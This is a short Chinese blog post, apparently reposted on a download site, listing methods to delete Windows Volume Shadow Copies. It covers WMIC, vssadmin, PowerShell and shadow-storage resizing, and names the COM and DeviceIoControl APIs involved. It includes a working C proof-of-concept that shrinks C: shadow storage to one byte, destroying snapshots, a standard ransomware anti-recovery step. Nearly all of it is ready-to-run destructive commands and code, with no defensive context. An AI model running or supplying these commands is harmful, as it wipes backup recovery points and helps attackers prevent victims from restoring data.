一、几种系统方式卷影删除

1.1 WMIC

cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete

1.2 VSSADMIN

vssadmin Delete Shadow /all

1.3 Powershell

Get-WmiObject Win32_ShadowCopy| % {$_.Delete()}
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject

1.4 调整大小为0

vssadmin resize shadowstorage /for=<backed volume>/on=<backup location volume> /maxsize=<new size>

 

二、代码实现

2.1 COM对象删除卷影

IVssBackupComponents::DeleteSnapshots

2.2 COM对象修改大小为0

IVssDifferentialSoftwareSnapshotMgmt::ChangeDiffAreaMaximumSize

2.3 DeviceIoControl删除卷影

发送IOCTL_VOLSNAP_DELETE_SNAPSHOT删除卷影

2.4 DeviceIoControl修改大小为0

发送IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE调整卷影大小

#include <Windows.h>
#include <tchar.h>


typedef struct _DIFF_AREA_SIZES
{
    LONGLONG UsedSpace; //value used for querying only
    LONGLONG AllocatedSpace; //value used for querying only
    LONGLONG MaximumSpace; //0 means UNBOUNDED
} DIFF_AREA_SIZES, *PDIFF_AREA_SIZES;

#define IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE 0x53c028 //type=0x53, function=0xc, method=METHOD_BUFFERED, Access=(FILE_READ_ACCESS | FILE_WRITE_ACCESS)

DWORD dwBRet;
DIFF_AREA_SIZES diffAreaSize;
TCHAR* tszVolumePath = _T("\\\\.\\C:"); //hardcoded, but perfectly enough for a PoC
HANDLE hVolume;

int _tmain(int argc, _TCHAR** argv)
{
    diffAreaSize.UsedSpace = 0; //unused anyway
    diffAreaSize.AllocatedSpace = 0; //unused anyway
    diffAreaSize.MaximumSpace = 1; //set to 1 byte of snapshot storage

    _tprintf(_T("Calling CreateFile()...\r\n"));

    hVolume = CreateFile(
        tszVolumePath,
        FILE_GENERIC_READ | FILE_GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    _tprintf(TEXT("CreateFile() returned %i\r\n"), GetLastError());
    if (INVALID_HANDLE_VALUE == hVolume)
    {
        return GetLastError();
    }

    _tprintf(_T("Calling DeviceIoControl()...\r\n"));

    DeviceIoControl(
        hVolume,
        IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE,
        &diffAreaSize,
        sizeof(diffAreaSize),
        NULL,
        0,
        &dwBRet,
        NULL
    );
    _tprintf(_T("DeviceIoControl() returned %i\r\n"), GetLastError());
    CloseHandle(hVolume);
    return GetLastError();
}

View Code

 

三、参考

https://github.com/gtworek/PSBits/blob/942b0e2293f6fcd4d5938ae387a3ee9e81ea94e8/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE.c

https://www.freebuf.com/articles/system/239560.html

原文地址:http://www.cnblogs.com/ciyze0101/p/16901841.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性